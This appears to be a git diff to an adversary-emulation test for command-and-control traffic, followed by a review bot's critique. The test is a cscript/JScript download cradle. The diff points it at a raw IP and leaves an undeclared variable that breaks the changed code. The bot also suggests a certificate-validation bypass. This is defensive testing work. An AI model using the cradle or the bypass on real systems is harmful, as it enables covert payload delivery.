diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index ff74708f..bdcea45a 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -242,20 +242,18 @@ Uses cscript //E:jscript to download a file
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
-| file_url | URL to retrieve file from | Url | https://www.w3.org/TR/PNG/iso_8859-1.txt|
-| out_file | File to download payload to | Path | T1071-Out.txt|
+| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
 #### Attack Commands: Run with `command_prompt`!
 ```
-echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
 cscript //E:Jscript #{script_file}
 ```
 #### Cleanup Commands:
 ```
 del #{script_file} /F /Q
-del #{out_file} /F /Q
 ```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index e4323de6..ecca15ad 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -27961,18 +27961,16 @@ command-and-control:
 file_url:
 description: URL to retrieve file from
 type: Url
- default: https://www.w3.org/TR/PNG/iso_8859-1.txt
- out_file:
- description: File to download payload to
- type: Path
- default: T1071-Out.txt
+ default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
 executor:
 name: command_prompt
 elevation_required: false
 command: |
- echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+ echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
 cscript //E:Jscript #{script_file}
- cleanup_command: "del #{script_file} /F /Q\ndel #{out_file} /F /Q "
+ cleanup_command: 'del #{script_file} /F /Q
+
+'
 T1032:
 technique:
 x_mitre_data_sources:
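Review bot: The rewritten `command` on the added `+ echo var url = ...` line drops the `filename = "#{out_file}"` declaration, but the script body still calls `stream.SaveToFile(filename, 1)`, so under cscript the payload will be fetched and then the script dies with a `'filename' is undefined` runtime error, while the `out_file` input it depended on has been removed from the inputs and from `cleanup_command`, so nothing would delete the output even if it were written. The smallest repair is to keep a declaration with a fixed name and restore the cleanup, e.g. `echo var url = "#{file_url}", filename = "T1071-Out.txt", fso = ...` and `cleanup_command: "del #{script_file} /F /Q\ndel T1071-Out.txt /F /Q"`, or preferably put the `out_file` input back so the test stays parameterized. Separately, switching `file_url` from `https://www.w3.org/...` to the bare IP `https://128.30.52.100/...` over HTTPS will presumably fail certificate name validation in `MSXML2.ServerXMLHTTP`, which validates server certificates by default, so `request.send()` likely throws before the `request.status === 200` check ever runs unless the script first sets `request.setOption(2, 13056)` (ignore all server certificate errors); this is worth confirming on a test host, and if the intent was to avoid DNS-based detection, a raw-IP TLS fetch from cscript is itself a strong detection signal worth noting in the description. The same command body appears in the T1071.md hunk above and needs the same correction.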